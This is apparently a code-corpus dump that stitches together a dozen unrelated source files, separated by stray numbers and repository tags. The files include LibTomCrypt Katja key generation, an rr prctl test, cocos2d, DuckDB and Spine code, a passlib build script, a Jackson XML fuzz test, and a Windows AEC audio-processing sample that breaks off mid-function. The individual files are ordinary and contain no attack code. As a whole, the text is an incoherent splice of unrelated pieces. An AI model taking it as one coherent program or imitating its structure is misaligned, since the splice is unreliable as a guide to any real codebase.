/* LibTomCrypt, modular cryptographic library -- <NAME> * * LibTomCrypt is a library that provides various cryptographic * algorithms in a highly modular and flexible manner. * * The library is free for all purposes without any express * guarantee it works. * * <NAME>, <EMAIL>, http://libtomcrypt.com */ #include "tomcrypt.h" /** @file katja_make_key.c Katja key generation, <NAME> */ #ifdef MKAT /** Create a Katja key @param prng An active PRNG state @param wprng The index of the PRNG desired @param size The size of the modulus (key size) desired (octets) @param key [out] Destination of a newly created private key pair @return CRYPT_OK if successful, upon error all allocated ram is freed */ int katja_make_key(prng_state *prng, int wprng, int size, katja_key *key) { void *p, *q, *tmp1, *tmp2; int err; LTC_ARGCHK(key != NULL); LTC_ARGCHK(ltc_mp.name != NULL); if ((size < (MIN_KAT_SIZE/8)) || (size > (MAX_KAT_SIZE/8))) { return CRYPT_INVALID_KEYSIZE; } if ((err = prng_is_valid(wprng)) != CRYPT_OK) { return err; } if ((err = mp_init_multi(&p, &q, &tmp1, &tmp2, NULL)) != CRYPT_OK) { return err; } /* divide size by three */ size = (((size << 3) / 3) + 7) >> 3; /* make prime "q" (we negate size to make q == 3 mod 4) */ if ((err = rand_prime(q, -size, prng, wprng)) != CRYPT_OK) { goto done; } if ((err = mp_sub_d(q, 1, tmp1)) != CRYPT_OK) { goto done; } /* make prime "p" */ do { if ((err = rand_prime(p, size+1, prng, wprng)) != CRYPT_OK) { goto done; } if ((err = mp_gcd(p, tmp1, tmp2)) != CRYPT_OK) { goto done; } } while (mp_cmp_d(tmp2, 1) != LTC_MP_EQ); /* make key */ if ((err = mp_init_multi(&key->d, &key->N, &key->dQ, &key->dP, &key->qP, &key->p, &key->q, &key->pq, NULL)) != CRYPT_OK) { goto error; } /* n=p^2q and 1/n mod pq */ if ((err = mp_copy( p, key->p)) != CRYPT_OK) { goto error2; } if ((err = mp_copy( q, key->q)) != CRYPT_OK) { goto error2; } if ((err = mp_mul(key->p, key->q, key->pq)) != CRYPT_OK) { goto error2; } /* tmp1 = pq */ if ((err = mp_mul(key->pq, key->p, key->N)) != CRYPT_OK) { goto error2; } /* N = p^2q */ if ((err = mp_sub_d( p, 1, tmp1)) != CRYPT_OK) { goto error2; } /* tmp1 = q-1 */ if ((err = mp_sub_d( q, 1, tmp2)) != CRYPT_OK) { goto error2; } /* tmp2 = p-1 */ if ((err = mp_lcm(tmp1, tmp2, key->d)) != CRYPT_OK) { goto error2; } /* tmp1 = lcd(p-1,q-1) */ if ((err = mp_invmod( key->N, key->d, key->d)) != CRYPT_OK) { goto error2; } /* key->d = 1/N mod pq */ /* optimize for CRT now */ /* find d mod q-1 and d mod p-1 */ if ((err = mp_mod( key->d, tmp1, key->dP)) != CRYPT_OK) { goto error2; } /* dP = d mod p-1 */ if ((err = mp_mod( key->d, tmp2, key->dQ)) != CRYPT_OK) { goto error2; } /* dQ = d mod q-1 */ if ((err = mp_invmod( q, p, key->qP)) != CRYPT_OK) { goto error2; } /* qP = 1/q mod p */ /* set key type (in this case it's CRT optimized) */ key->type = PK_PRIVATE; /* return ok and free temps */ err = CRYPT_OK; goto done; error2: mp_clear_multi( key->d, key->N, key->dQ, key->dP, key->qP, key->p, key->q, key->pq, NULL); error: done: mp_clear_multi( tmp2, tmp1, p, q, NULL); return err; } #endif /* $Source: /cvs/libtom/libtomcrypt/src/pk/katja/katja_make_key.c,v $ */ /* $Revision: 1.10 $ */ /* $Date: 2006/03/31 14:15:35 $ */
1,786
5,156
/* -*- Mode: C; tab-width: 8; c-basic-offset: 2; indent-tabs-mode: nil; -*- */ #include "util.h" int main(void) { char setname[16] = "prctl-test"; char getname[16]; unsigned long slack = sizeof(unsigned long) == 4 ? 1024 * 1024 * 1024 : (unsigned long)(1024LL * 1024 * 1024 * 8); int sig = 99; int tsc = 99; int dummy; test_assert(0 == prctl(PR_SET_KEEPCAPS, 0)); test_assert(0 == prctl(PR_GET_KEEPCAPS)); test_assert(0 == prctl(PR_SET_KEEPCAPS, 1)); test_assert(1 == prctl(PR_GET_KEEPCAPS)); test_assert(0 == prctl(PR_SET_NAME, setname)); test_assert(0 == prctl(PR_GET_NAME, getname)); atomic_printf("set name `%s'; got name `%s'\n", setname, getname); test_assert(!strcmp(getname, setname)); test_assert(0 == prctl(PR_SET_DUMPABLE, 0)); test_assert(0 == prctl(PR_GET_DUMPABLE)); test_assert(0 == prctl(PR_SET_DUMPABLE, 1)); test_assert(1 == prctl(PR_GET_DUMPABLE)); test_assert(0 == prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0)); test_assert(1 == prctl(PR_GET_NO_NEW_PRIVS, 0, 0, 0, 0)); test_assert(0 == prctl(PR_SET_TIMERSLACK, slack)); /* prctl coerces its result to int */ test_assert((int)slack == prctl(PR_GET_TIMERSLACK)); test_assert(0 == prctl(PR_MCE_KILL, PR_MCE_KILL_SET, PR_MCE_KILL_EARLY, 0, 0)); test_assert(PR_MCE_KILL_EARLY == prctl(PR_MCE_KILL_GET, 0, 0, 0, 0)); test_assert(-1 == prctl(PR_GET_ENDIAN, &dummy) && errno == EINVAL); test_assert(-1 == prctl(PR_GET_FPEMU, &dummy) && errno == EINVAL); test_assert(-1 == prctl(PR_GET_FPEXC, &dummy) && errno == EINVAL); test_assert(-1 == prctl(PR_GET_UNALIGN, &dummy) && errno == EINVAL); test_assert(0 == prctl(PR_GET_PDEATHSIG, (unsigned long)&sig)); test_assert(sig == 0); test_assert(0 == prctl(PR_GET_TSC, (unsigned long)&tsc)); test_assert(tsc == PR_TSC_ENABLE); test_assert(0 == prctl(PR_GET_SECCOMP)); int reaper; test_assert(0 == prctl(PR_SET_CHILD_SUBREAPER, 1)); test_assert(0 == prctl(PR_GET_CHILD_SUBREAPER, &reaper)); test_assert(reaper == 1); unsigned int size = 0; test_assert(0 == prctl(PR_SET_MM, PR_SET_MM_MAP_SIZE, &size, 0, 0)); test_assert(size != 0); // On a kernel without PR_SET_VMA, this will return EINVAL. // On a kernel with it, it should return EBADF, because // the rr page is not an anonymous mapping. ssize_t page_size = sysconf(_SC_PAGE_SIZE); test_assert(-1 == prctl(PR_SET_VMA, PR_SET_VMA_ANON_NAME, 0x7000000, page_size, "foo") && (errno == EINVAL || errno == EBADF)); atomic_puts("EXIT-SUCCESS"); return 0; }
1,165
898
/**************************************************************************** Copyright (c) 2016-2017 Chukong Technologies Inc. http://www.cocos2d-x.org Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions: The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software. THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. ****************************************************************************/ #pragma once #include "audio/android/IAudioPlayer.h" #include "audio/android/OpenSLHelper.h" #include "audio/android/PcmData.h" #include <mutex> #include <condition_variable> namespace cocos2d { namespace experimental { class AudioMixerController; class PcmAudioService { public: inline int getChannelCount() const { return _numChannels; }; inline int getSampleRate() const { return _sampleRate; }; private: PcmAudioService(SLEngineItf engineItf, SLObjectItf outputMixObject); virtual ~PcmAudioService(); bool init(AudioMixerController* controller, int numChannels, int sampleRate, int bufferSizeInBytes); bool enqueue(); void bqFetchBufferCallback(SLAndroidSimpleBufferQueueItf bq); void pause(); void resume(); private: SLEngineItf _engineItf; SLObjectItf _outputMixObj; SLObjectItf _playObj; SLPlayItf _playItf; SLVolumeItf _volumeItf; SLAndroidSimpleBufferQueueItf _bufferQueueItf; int _numChannels; int _sampleRate; int _bufferSizeInBytes; AudioMixerController* _controller; friend class SLPcmAudioPlayerCallbackProxy; friend class AudioPlayerProvider; }; }} // namespace cocos2d { namespace experimental {
724
461
import java.util.HashMap; import java.util.Map; public class MapSum2 { private Node root; private class Node { private int val; private Map<Character, Node> next; public Node(boolean isWord, int val) { this.val = val; this.next = new HashMap<>(); } public Node() { this(false, 0); } } /** * Initialize your data structure here. */ public MapSum2() { root = new Node(); } public void insert(String key, int val) { Node currNode = root; Character c; for (int i = 0; i < key.length(); i++) { c = key.charAt(i); if (currNode.next.get(c) == null) { currNode.next.put(c, new Node()); } currNode = currNode.next.get(c); } currNode.val = val; } public int sum(String prefix) { Node node = root; Character c; for (int i = 0; i < prefix.length(); i++) { c = prefix.charAt(i); if (node.next.get(c) == null) { return 0; } node = node.next.get(c); } return dfs(node); } // node 为 root 的 val 的和 private int dfs(Node node) { // 注意:起始值不是 0 int sum = node.val; for (Character c : node.next.keySet()) { sum += dfs(node.next.get(c)); } return sum; } public static void main(String[] args) { MapSum2 mapSum2 = new MapSum2(); mapSum2.insert("apple", 3); int sum1 = mapSum2.sum("ap");// Output: 3 System.out.println(sum1); mapSum2.insert("app", 2); //Output: Null int sum2 = mapSum2.sum("ap");//Output: 5 System.out.println(sum2); } }
1,031
2,816
<gh_stars>1000+ //===----------------------------------------------------------------------===// // DuckDB // // duckdb/common/enums/optimizer_type.hpp // // //===----------------------------------------------------------------------===// #pragma once #include "duckdb/common/constants.hpp" namespace duckdb { enum class OptimizerType : uint32_t { INVALID = 0, EXPRESSION_REWRITER, FILTER_PULLUP, FILTER_PUSHDOWN, REGEX_RANGE, IN_CLAUSE, JOIN_ORDER, DELIMINATOR, UNUSED_COLUMNS, STATISTICS_PROPAGATION, COMMON_SUBEXPRESSIONS, COMMON_AGGREGATE, COLUMN_LIFETIME, TOP_N, REORDER_FILTER }; string OptimizerTypeToString(OptimizerType type); OptimizerType OptimizerTypeFromString(const string &str); } // namespace duckdb
293
719
<reponame>skysliently/momo-code-sec-inspector-java-myversion<filename>src/test/testData/lang/java/rule/momosecurity/BroadCORSAllowOrigin/stub/CorsRegistration.java package org.springframework.web.servlet.config.annotation; public class CorsRegistration { public CorsRegistration(String arg1) {} public CorsRegistration allowedOrigins(String origins) { return this; } }
131
437
<filename>src/test/java/com/fasterxml/jackson/dataformat/xml/fuzz/Fuzz465_32906_CDataReadTest.java package com.fasterxml.jackson.dataformat.xml.fuzz; import com.fasterxml.jackson.core.exc.StreamReadException; import com.fasterxml.jackson.databind.JsonNode; import com.fasterxml.jackson.dataformat.xml.XmlMapper; import com.fasterxml.jackson.dataformat.xml.XmlTestBase; public class Fuzz465_32906_CDataReadTest extends XmlTestBase { private final XmlMapper MAPPER = newMapper(); public void testIssue465() throws Exception { byte[] doc = readResource("/data/fuzz-32906.xml"); try { JsonNode root = MAPPER.readTree(doc); fail("Should not pass, got: "+root); } catch (StreamReadException e) { verifyException(e, "Unexpected EOF in CDATA"); } } }
339
2,542
#pragma once namespace KtlThreadpool{ #define VOLATILE_MEMORY_BARRIER() asm volatile ("" : : : "memory") template<typename T> inline T VolatileLoad(T const * pt) { T val = *(T volatile const *)pt; VOLATILE_MEMORY_BARRIER(); return val; } template<typename T> inline void VolatileStore(T* pt, T val) { VOLATILE_MEMORY_BARRIER(); *(T volatile *)pt = val; } template <typename T> class Volatile { private: T m_val; public: inline Volatile() { } inline Volatile(const T &val) { ((volatile T &) m_val) = val; } inline Volatile(const Volatile<T> &other) { ((volatile T &) m_val) = other.Load(); } inline T Load() const { return VolatileLoad(&m_val); } inline T LoadWithoutBarrier() const { return ((volatile T &) m_val); } inline void Store(const T& val) { VolatileStore(&m_val, val); } inline void StoreWithoutBarrier(const T& val) const { ((volatile T &)m_val) = val; } inline volatile T* GetPointer() { return (volatile T*)&m_val; } inline T& RawValue() { return m_val; } inline operator T() const { return this->Load(); } inline Volatile<T>& operator=(T val) {Store(val); return *this;} inline T volatile * operator&() { return this->GetPointer(); } inline T volatile const * operator&() const { return this->GetPointer(); } template<typename TOther> inline bool operator==(const TOther& other) const { return this->Load() == other; } template<typename TOther> inline bool operator!=(const TOther& other) const { return this->Load() != other; } inline Volatile<T>& operator+=(T val) { Store(this->Load() + val); return *this; } inline Volatile<T>& operator-=(T val) { Store(this->Load() - val); return *this; } inline Volatile<T>& operator|=(T val) { Store(this->Load() | val); return *this; } inline Volatile<T>& operator&=(T val) { Store(this->Load() & val); return *this; } inline bool operator!() const { return !this->Load(); } inline Volatile& operator++() { this->Store(this->Load()+1); return *this; } inline T operator++(int) { T val = this->Load(); this->Store(val+1); return val; } inline Volatile& operator--() { this->Store(this->Load()-1); return *this; } inline T operator--(int) { T val = this->Load(); this->Store(val-1); return val; } }; }
1,186
348
<filename>docs/data/leg-t2/038/03810420.json {"nom":"Saint-Martin-de-Vaulserre","circ":"10ème circonscription","dpt":"Isère","inscrits":236,"abs":134,"votants":102,"blancs":6,"nuls":0,"exp":96,"res":[{"nuance":"REM","nom":"<NAME>","voix":68},{"nuance":"FN","nom":"<NAME>","voix":28}]}
117
412
public abstract class MyAbstractClass { abstract public int num(); public int concreteNum() { return 11; } }
35
674
"""update version string during build""" #============================================================================= # imports #============================================================================= from __future__ import with_statement # core import os import re import time from distutils.dist import Distribution # pkg # local __all__ = [ "stamp_source", "stamp_distutils_output", ] #============================================================================= # helpers #============================================================================= def get_command_class(opts, name): return opts['cmdclass'].get(name) or Distribution().get_command_class(name) def stamp_source(base_dir, version, dry_run=False): """update version string in passlib dist""" path = os.path.join(base_dir, "passlib", "__init__.py") with open(path) as fh: input = fh.read() output, count = re.subn('(?m)^__version__\s*=.*$', '__version__ = ' + repr(version), input) assert count == 1, "failed to replace version string" if not dry_run: os.unlink(path) # sdist likes to use hardlinks with open(path, "w") as fh: fh.write(output) def stamp_distutils_output(opts, version): # subclass buildpy to update version string in source _build_py = get_command_class(opts, "build_py") class build_py(_build_py): def build_packages(self): _build_py.build_packages(self) stamp_source(self.build_lib, version, self.dry_run) opts['cmdclass']['build_py'] = build_py # subclass sdist to do same thing _sdist = get_command_class(opts, "sdist") class sdist(_sdist): def make_release_tree(self, base_dir, files): _sdist.make_release_tree(self, base_dir, files) stamp_source(base_dir, version, self.dry_run) opts['cmdclass']['sdist'] = sdist #============================================================================= # eof #=============================================================================
708
2,113
<filename>Engine/source/afx/forces/afxForce.h<gh_stars>1000+ //~~~~~~~~~~~~~~~~~~~~//~~~~~~~~~~~~~~~~~~~~//~~~~~~~~~~~~~~~~~~~~//~~~~~~~~~~~~~~~~~~~~~// // Arcane-FX for MIT Licensed Open Source version of Torque 3D from GarageGames // Copyright (C) 2015 Faust Logic, Inc. // // Permission is hereby granted, free of charge, to any person obtaining a copy // of this software and associated documentation files (the "Software"), to // deal in the Software without restriction, including without limitation the // rights to use, copy, modify, merge, publish, distribute, sublicense, and/or // sell copies of the Software, and to permit persons to whom the Software is // furnished to do so, subject to the following conditions: // // The above copyright notice and this permission notice shall be included in // all copies or substantial portions of the Software. // // THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR // IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, // FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE // AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER // LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING // FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS // IN THE SOFTWARE. // //~~~~~~~~~~~~~~~~~~~~//~~~~~~~~~~~~~~~~~~~~//~~~~~~~~~~~~~~~~~~~~//~~~~~~~~~~~~~~~~~~~~~// #ifndef _AFX_FORCE_H_ #define _AFX_FORCE_H_ //~~~~~~~~~~~~~~~~~~~~//~~~~~~~~~~~~~~~~~~~~//~~~~~~~~~~~~~~~~~~~~//~~~~~~~~~~~~~~~~~~~~~// // afxForce Data class afxForceDesc; class afxForceData : public GameBaseData { typedef GameBaseData Parent; public: StringTableEntry force_set_name; afxForceDesc* force_desc; public: /*C*/ afxForceData(); /*C*/ afxForceData(const afxForceData&, bool = false); virtual bool onAdd(); virtual void packData(BitStream* stream); virtual void unpackData(BitStream* stream); virtual bool allowSubstitutions() const { return true; } virtual afxForceData* cloneAndPerformSubstitutions(const SimObject*, S32 index=0)=0; static void initPersistFields(); }; //~~~~~~~~~~~~~~~~~~~~//~~~~~~~~~~~~~~~~~~~~//~~~~~~~~~~~~~~~~~~~~//~~~~~~~~~~~~~~~~~~~~~// // afxForce class afxForce { afxForceData* datablock; protected: F32 fade_amt; public: /*C*/ afxForce(); /*D*/ ~afxForce(); virtual bool onNewDataBlock(afxForceData* dptr, bool reload); void setFadeAmount(F32 amt) { fade_amt = amt; } virtual void start() {}; virtual void update(F32 dt) {}; virtual Point3F evaluate(Point3F pos, Point3F v, F32 mass) { return Point3F(0,0,0); }; //=0; }; //~~~~~~~~~~~~~~~~~~~~//~~~~~~~~~~~~~~~~~~~~//~~~~~~~~~~~~~~~~~~~~//~~~~~~~~~~~~~~~~~~~~~// class afxForceDesc { private: static Vector<afxForceDesc*>* forces; public: /*C*/ afxForceDesc(); virtual bool testForceType(const SimDataBlock*) const=0; virtual afxForce* create() const=0; static bool identifyForce(afxForceData*); }; //~~~~~~~~~~~~~~~~~~~~//~~~~~~~~~~~~~~~~~~~~//~~~~~~~~~~~~~~~~~~~~//~~~~~~~~~~~~~~~~~~~~~// #endif // _AFX_FORCE_H_
1,048
898
/****************************************************************************** * Spine Runtimes Software License v2.5 * * Copyright (c) 2013-2016, Esoteric Software * All rights reserved. * * You are granted a perpetual, non-exclusive, non-sublicensable, and * non-transferable license to use, install, execute, and perform the Spine * Runtimes software and derivative works solely for personal or internal * use. Without the written permission of Esoteric Software (see Section 2 of * the Spine Software License Agreement), you may not (a) modify, translate, * adapt, or develop new applications using the Spine Runtimes or otherwise * create derivative works or improvements of the Spine Runtimes or (b) remove, * delete, alter, or obscure any trademarks or any copyright, trademark, patent, * or other intellectual property or proprietary rights notices on or in the * Software, including any copy thereof. Redistributions in binary or source * form must include this license and terms. * * THIS SOFTWARE IS PROVIDED BY ESOTERIC SOFTWARE "AS IS" AND ANY EXPRESS OR * IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF * MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO * EVENT SHALL ESOTERIC SOFTWARE BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, * PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES, BUSINESS INTERRUPTION, OR LOSS OF * USE, DATA, OR PROFITS) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER * IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE * POSSIBILITY OF SUCH DAMAGE. *****************************************************************************/ #include "spine/Color.h" #include "spine/extension.h" spColor* spColor_create() { return MALLOC(spColor, 1); } void spColor_dispose(spColor* self) { if (self) FREE(self); } void spColor_setFromFloats(spColor* self, float r, float g, float b, float a) { self->r = r; self->g = g; self->b = b; self->a = a; } void spColor_setFromColor(spColor* self, spColor* otherColor) { self->r = otherColor->r; self->g = otherColor->g; self->b = otherColor->b; self->a = otherColor->a; } void spColor_addColor(spColor* self, spColor* otherColor) { self->r += otherColor->r; self->g += otherColor->g; self->b += otherColor->b; self->a += otherColor->a; spColor_clamp(self); } void spColor_addFloats(spColor* self, float r, float g, float b, float a) { self->r += r; self->g += g; self->b += b; self->a += a; spColor_clamp(self); } void spColor_clamp(spColor* self) { if (self->r < 0) self->r = 0; else if (self->r > 1) self->r = 1; if (self->g < 0) self->g = 0; else if (self->g > 1) self->g = 1; if (self->b < 0) self->b = 0; else if (self->b > 1) self->b = 1; if (self->a < 0) self->a = 0; else if (self->a > 1) self->a = 1; }
974
3,084
<reponame>galeksandrp/Windows-driver-samples // // AecApoMFX.cpp -- Copyright (c) Microsoft Corporation. All rights reserved. // // Description: // // Implementation of CAecApoMFX // #include <atlbase.h> #include <atlcom.h> #include <atlcoll.h> #include <atlsync.h> #include <mmreg.h> #include <initguid.h> #include <audioenginebaseapo.h> #include <baseaudioprocessingobject.h> #include <resource.h> #include <float.h> #include "AecApo.h" #include <devicetopology.h> #include <CustomPropKeys.h> #define SUPPORTED_AEC_SAMPLINGRATE (16000) // Static declaration of the APO_REG_PROPERTIES structure // associated with this APO. The number in <> brackets is the // number of IIDs supported by this APO. If more than one, then additional // IIDs are added at the end #pragma warning (disable : 4815) const AVRT_DATA CRegAPOProperties<1> CAecApoMFX::sm_RegProperties( __uuidof(AecApoMFX), // clsid of this APO L"Sample MFX Aec APO", // friendly name of this APO L"Copyright (c) Microsoft Corporation", // copyright info 1, // major version # 0, // minor version # __uuidof(IAudioProcessingObject), // iid of primary interface (APO_FLAG) (APO_FLAG_BITSPERSAMPLE_MUST_MATCH | APO_FLAG_FRAMESPERSECOND_MUST_MATCH), // kak check this DEFAULT_APOREG_MININPUTCONNECTIONS, DEFAULT_APOREG_MAXINPUTCONNECTIONS, DEFAULT_APOREG_MINOUTPUTCONNECTIONS, DEFAULT_APOREG_MAXOUTPUTCONNECTIONS, DEFAULT_APOREG_MAXINSTANCES ); #pragma AVRT_CODE_BEGIN //------------------------------------------------------------------------- // Description: // // Do the actual processing of data. // // Parameters: // // u32NumInputConnections - [in] number of input connections // ppInputConnections - [in] pointer to list of input APO_CONNECTION_PROPERTY pointers // u32NumOutputConnections - [in] number of output connections // ppOutputConnections - [in] pointer to list of output APO_CONNECTION_PROPERTY pointers // // Return values: // // void // // Remarks: // // This function processes data in a manner dependent on the implementing // object. This routine can not fail and can not block, or call any other // routine that blocks, or touch pagable memory. // STDMETHODIMP_(void) CAecApoMFX::APOProcess( UINT32 u32NumInputConnections, APO_CONNECTION_PROPERTY** ppInputConnections, UINT32 u32NumOutputConnections, APO_CONNECTION_PROPERTY** ppOutputConnections) { UNREFERENCED_PARAMETER(u32NumInputConnections); UNREFERENCED_PARAMETER(u32NumOutputConnections); FLOAT32 *pf32InputFrames, *pf32OutputFrames; ATLASSERT(m_bIsLocked); // assert that the number of input and output connectins fits our registration properties ATLASSERT(m_pRegProperties->u32MinInputConnections <= u32NumInputConnections); ATLASSERT(m_pRegProperties->u32MaxInputConnections >= u32NumInputConnections); ATLASSERT(m_pRegProperties->u32MinOutputConnections <= u32NumOutputConnections); ATLASSERT(m_pRegProperties->u32MaxOutputConnections >= u32NumOutputConnections); ATLASSERT(ppInputConnections[0]->u32Signature == APO_CONNECTION_PROPERTY_V2_SIGNATURE); ATLASSERT(ppOutputConnections[0]->u32Signature == APO_CONNECTION_PROPERTY_V2_SIGNATURE); APO_CONNECTION_PROPERTY_V2* inConnection = reinterpret_cast<APO_CONNECTION_PROPERTY_V2*>(ppInputConnections[0]); APO_CONNECTION_PROPERTY_V2* outConnection = reinterpret_cast<APO_CONNECTION_PROPERTY_V2*>(ppOutputConnections[0]); // check APO_BUFFER_FLAGS. switch( ppInputConnections[0]->u32BufferFlags ) { case BUFFER_INVALID: { ATLASSERT(false); // invalid flag - should never occur. don't do anything. break; } case BUFFER_VALID: case BUFFER_SILENT: { // get input pointer to connection buffer pf32InputFrames = reinterpret_cast<FLOAT32*>(ppInputConnections[0]->pBuffer); ATLASSERT( IS_VALID_TYPED_READ_POINTER(pf32InputFrames) ); // get output pointer to connection buffer pf32OutputFrames = reinterpret_cast<FLOAT32*>(ppOutputConnections[0]->pBuffer); ATLASSERT( IS_VALID_TYPED_WRITE_POINTER(pf32OutputFrames) ); // // Provide microphone buffer and timestamps to AEC algorithm // UNREFERENCED_PARAMETER(inConnection); UNREFERENCED_PARAMETER(outConnection); // Set the valid frame count. ppOutputConnections[0]->u32ValidFrameCount = ppInputConnections[0]->u32ValidFrameCount; ppOutputConnections[0]->u32BufferFlags = ppInputConnections[0]->u32BufferFlags; break; } default: { ATLASSERT(false); // invalid flag - should never occur break; } } // switch } // APOProcess #pragma AVRT_CODE_END //------------------------------------------------------------------------- // Description: // // Parameters: // // pTime - [out] hundreds-of-nanoseconds // // Return values: // // S_OK on success, a failure code on failure STDMETHODIMP CAecApoMFX::GetLatency(HNSTIME* pTime) { ASSERT_NONREALTIME(); HRESULT hr = S_OK; IF_TRUE_ACTION_JUMP(NULL == pTime, hr = E_POINTER, Exit); *pTime = 0; Exit: return hr; } //------------------------------------------------------------------------- // Description: // // Verifies that the APO is ready to process and locks its state if so. // // Parameters: // // u32NumInputConnections - [in] number of input connections attached to this APO // ppInputConnections - [in] connection descriptor of each input connection attached to this APO // u32NumOutputConnections - [in] number of output connections attached to this APO // ppOutputConnections - [in] connection descriptor of each output connection attached to this APO // // Return values: // // S_OK Object is locked and ready to process. // E_POINTER Invalid pointer passed to function. // APOERR_INVALID_CONNECTION_FORMAT Invalid connection format. // APOERR_NUM_CONNECTIONS_INVALID Number of input or output connections is not valid on // this APO. STDMETHODIMP CAecApoMFX::LockForProcess(UINT32 u32NumInputConnections, APO_CONNECTION_DESCRIPTOR** ppInputConnections, UINT32 u32NumOutputConnections, APO_CONNECTION_DESCRIPTOR** ppOutputConnections) { ASSERT_NONREALTIME(); HRESULT hr = S_OK; UNCOMPRESSEDAUDIOFORMAT uncompAudioFormat; // fill in the samples per frame for the output (since APO_FLAG_SAMPLESPERFRAME_MUST_MATCH is not selected) // There are two potentially different samples per frame values here. The input, which will be interleaved + primary. // And the output, which is just the primary. Because this is used for clearing the zeroing the output buffer, we're going // to fill it in with the output samples per frame. ProcessBuffer has both. hr = ppOutputConnections[0]->pFormat->GetUncompressedAudioFormat(&uncompAudioFormat); IF_FAILED_JUMP(hr, Exit); m_u32SamplesPerFrame = uncompAudioFormat.dwSamplesPerFrame; hr = CBaseAudioProcessingObject::LockForProcess(u32NumInputConnections, ppInputConnections, u32NumOutputConnections, ppOutputConnections); IF_FAILED_JUMP(hr, Exit); Exit: return hr; } // The method that this long comment refers to is "Initialize()" //------------------------------------------------------------------------- // Description: // // Generic initialization routine for APOs. // // Parameters: // // cbDataSize - [in] the size in bytes of the initialization data. // pbyData - [in] initialization data specific to this APO // // Return values: // // S_OK Successful completion. // E_POINTER Invalid pointer passed to this function. // E_INVALIDARG Invalid argument // AEERR_ALREADY_INITIALIZED APO is already initialized // // Remarks: // // This method initializes the APO. The data is variable length and // should have the form of: // // struct MyAPOInitializationData // { // APOInitBaseStruct APOInit; // ... // add additional fields here // }; // // If the APO needs no initialization or needs no data to initialize // itself, it is valid to pass NULL as the pbyData parameter and 0 as // the cbDataSize parameter. // // As part of designing an APO, decide which parameters should be // immutable (set once during initialization) and which mutable (changeable // during the lifetime of the APO instance). Immutable parameters must // only be specifiable in the Initialize call; mutable parameters must be // settable via methods on whichever parameter control interface(s) your // APO provides. Mutable values should either be set in the initialize // method (if they are required for proper operation of the APO prior to // LockForProcess) or default to reasonable values upon initialize and not // be required to be set before LockForProcess. // // Within the mutable parameters, you must also decide which can be changed // while the APO is locked for processing and which cannot. // // All parameters should be considered immutable as a first choice, unless // there is a specific scenario which requires them to be mutable; similarly, // no mutable parameters should be changeable while the APO is locked, unless // a specific scenario requires them to be. Following this guideline will // simplify the APO's state diagram and implementation and prevent certain // types of bug. // // If a parameter changes the APOs latency or MaxXXXFrames values, it must be // immutable. // // The default version of this function uses no initialization data, but does verify // the passed parameters and set the m_bIsInitialized member to true. // // Note: This method may not be called from a real-time processing thread. // HRESULT CAecApoMFX::Initialize(UINT32 cbDataSize, BYTE* pbyData) { HRESULT hr = S_OK; IF_TRUE_ACTION_JUMP( ((NULL == pbyData) && (0 != cbDataSize)), hr = E_INVALIDARG, Exit); IF_TRUE_ACTION_JUMP( ((NULL != pbyData) && (0 == cbDataSize)), hr = E_INVALIDARG, Exit); if (cbDataSize == sizeof(APOInitSystemEffects3)) { // // pbyData contains APOInitSystemEffects3 structure describing the microphone endpoint // APOInitSystemEffects3* papoSysFxInit3 = (APOInitSystemEffects3*)pbyData; m_initializedForEffectsDiscovery = papoSysFxInit3->InitializeForDiscoveryOnly; // Support for COMMUNICATIONS mode only when streaming IF_TRUE_ACTION_JUMP( !m_initializedForEffectsDiscovery && (papoSysFxInit3->AudioProcessingMode != AUDIO_SIGNALPROCESSINGMODE_COMMUNICATIONS), hr = E_INVALIDARG, Exit); m_audioSignalProcessingMode = papoSysFxInit3->AudioProcessingMode; // Register for notification of endpoint volume change in GetApoNotificationRegistrationInfo // Keep a reference to the device that will be registering for endpoint volume notifcations. IF_TRUE_ACTION_JUMP(papoSysFxInit3->pDeviceCollection == nullptr, hr = E_INVALIDARG, Exit); // Get the endpoint on which this APO has been created. It is the last device in the device collection. UINT32 numDevices; hr = papoSysFxInit3->pDeviceCollection->GetCount(&numDevices); IF_FAILED_JUMP(hr, Exit); IF_TRUE_ACTION_JUMP(numDevices <= 0, hr = E_INVALIDARG, Exit); hr = papoSysFxInit3->pDeviceCollection->Item(numDevices - 1, &m_spCaptureDevice); IF_FAILED_JUMP(hr, Exit); m_bIsInitialized = true; // Try to get the logging service, but ignore errors as failure to do logging it is not fatal. 